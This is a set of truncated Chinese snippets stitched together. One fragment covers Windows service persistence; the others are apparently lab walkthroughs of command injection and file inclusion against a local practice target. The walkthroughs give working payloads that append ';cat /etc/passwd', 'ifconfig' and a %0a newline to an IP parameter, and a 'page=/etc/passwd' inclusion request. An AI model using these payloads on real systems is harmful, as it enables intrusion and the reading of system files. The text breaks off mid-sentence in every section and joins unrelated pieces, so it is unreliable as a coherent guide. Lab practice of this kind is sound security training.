如果未正确配置Windows环境中的服务或这些服务可以用作持久性方法，则这些服务可能导致权限提升。创建一个新的服务需要管理员级别的特权，它已经不是隐蔽的持久性技术。然而，在红队的行动中，针对那些在威胁检测方面还不成熟的公司，可以用来制造进一步的干扰，企业应建立SOC能力，以识别在其恶

我们打开靶机选择“Example2”观察页面我们尝试http://192.168.29.148/commandexec/example2.php?ip=127.0.0.1;ifconfig结果我们尝试%0a于是payload为http://192.168.29.148/commandexec/example2.php?ip=127.0.0.1%0acat%20/etc/passwd结果我们观察靶机源码使用了正则来匹配IP地

我们打开靶机选择“Commandsinjection”选择“Example1”观察页面是不是跟很多家用路由器的的ping功能很像知识储备跟以前的知识一样，我们需要了解命令拼接符号的作用我们拼接payload为http://192.168.29.148/commandexec/example1.php?ip=127.0.0.1;cat%20/etc/passwd结果我们打

我们打开靶机选择文件包含页面，选择“Example2”观察页面尝试更换page参数http://192.168.29.148/fileincl/example2.php?page=/etc/passwd结果如下提示目前不存在继续尝试，